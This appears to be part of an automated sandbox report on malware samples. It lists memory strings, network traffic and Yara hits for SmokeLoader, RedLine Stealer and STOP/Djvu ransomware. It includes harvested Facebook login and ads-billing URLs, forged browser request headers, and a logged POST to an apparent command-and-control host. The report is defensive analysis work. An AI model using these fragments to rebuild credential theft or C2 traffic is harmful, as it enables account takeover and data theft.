Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnf equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingp equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingsz equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinguDX equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing| equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$, equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing^ equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingc equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/u5 equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$y equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingD equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingw.facebo7) equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of rangeUse whatppphatYk43h7gr riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?httphttps?Error (WinHttpSendRequest)Error (WinHttpReceiveResponseCeheg34g)Error (WinHttpQueryDataAvailable)Error (WinHttpReadData)g.com/iaaaehttp://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-form-urlencodedContent-Type: applicokcebofak.comaceboohttps://www.fOrigin: le Chrome";v="104"" Not A; Brand";v="99", "Googsec-ch-ua: "Chromium";v="104", gned-exchange;v=b3;q=0.9ng,*/*;q=0.8,application/sication/xml;q=0.9,image/webp,image/ap,appliAccept: text/html,application/xhtml+xmlq=0.1,bn;q=0.1,eu;q=0.1=0.1,ast;q=0.1,az;r;q=0.3,an;q=0.2,hy;qq=0.6,am;q=0.5,sq;q=0.4,aa;q=0.7,af;Accept-Language: en,q=0.9;q=0.8,jep-aliveection: keConn/ads/manager/account_settings/account_billingbusiness.facebook.comacebook.comsiness.fHost: buok.comHost: www.fath: 1920viewport-widsec-ch-ua-mobile: ?0tform: "Windows"sec-ch-ua-plaefers-color-scheme: lightsec-ch-prde-Insecure-Requests: 1Upgraetch-Site: noneSec-FSec-Fetch-Mode: navigatech-User: ?1Sec-Fetmenth-Dest: docuSec-Fetc/v13.0/omcebook.cHost: graph.faa-mobile: ?0sec-ch-udows"sec-ch-ua-platform: "Winw-form-urlencodedplication/x-wwContent-type: ap/*Accept: *ame-sitech-Site: sSec-Fetch-Mode: cors: emptySec-Fetch-Destook.com/r: https://www.facebRefereboofaceHost: www.t-Length: Contenh-ua-mobile: ?0sec-catform: "Windows"sec-ch-ua-plrefers-color-scheme: lightsec-ch-pre-Requests: 1Upgrade-Insecuode: navigateSec-Fetch-MSec-Fetch-User: ?1ocumentSec-Fetch-Dest: de-originite: samSec-Fetch-SError (WinHttpSetOption)Error (WinHttpAddRequestHeaders)vector<bool> too longalnumalnumalphaalphablankblankcntrlcntrlddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigit01SYSTEM_MALLOCTHREADSAFE=1SQLITE_local time unavailablelocaltimeunixepochutcweekday start of monthyeardayhourminutesecond%04d-%02d-%02d %02d:%02d:%02d%02d:%02d:%02d%04d-%02d-%02d%02d%06.3f%03d%.16g%lld%04djuliandaydatetimedatetimestrftimecurrent_timecurrent_timestampcurrent_date%NaN-Inf+InfInfNULL(NULL).922337203685477580?FunctionSavepointAutoCommitTransactionSorterNextPrevIfOpenNextIfOpenPrevNextAggStepCheckpointJournalModeVacuumVFilterVUpdateGotoGosubReturnNotInitCoroutineEndCoroutineYieldHaltIfNullHaltIntegerInt64StringNullSoftNullBlobVariableMoveCopySCopyResultRowCollSeqAddImmMustBeIntRealAffinityCastPermutationCompareJumpOnceIfIfNotColumnAffinityMakeRecordCountReadCookieSetCookieReopenIdxOpenReadOpenWriteOpenAutoindexOpenEphemeralSorterOpenSequenceTestOpenPseudoCloseSeekLTSeekLESeekGESeekGTSeekNoConflictNotFoundFoundNotExistsOrAndSequenceNewRowidInsertIsNullNotNullNeEqGtLeLtGeInsertIntBitAndBitOrShiftLeftShiftRightAddSubtractMultiplyDivideRemainderConcatDeleteBitNotString8ResetCountSorterCompareSorterDataRowKeyRowDataRowidNullRowLastSorterSortSortRewindSorterIn
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p.Rwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:17 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: word" class="inputtext _55r1 inputtext _9npi inputtext _9npi" name="pass" id="pass" tabindex="0" placeholder="Password" value="" autocomplete="current-password" aria-label="Password" /><div class="_9ls7" id="u_0_4_+a"><a href="#" role="button"><div class="_9lsa"><div class="_9lsb" id="u_0_5_7R"></div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" class="_97w4" target="">Forgot account?</a><span role="presentation" aria-hidden="true"> equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569867418.0000000000868000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.558357025.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com, equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com4k equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com<O equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com@ F equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER+ equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comGER= equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com[3O equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com^i# equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.come equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: y5gLo05www.facebook.comGyfg23OMn2qknLZ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: }Twww.facebook.com equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
Source: unknown HTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 0.3.file.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.tfgatra.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.600e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: F4FD.exe, 00000006.00000002.521322299.00000000007BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Djvu Ransomware
Source: Yara match File source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
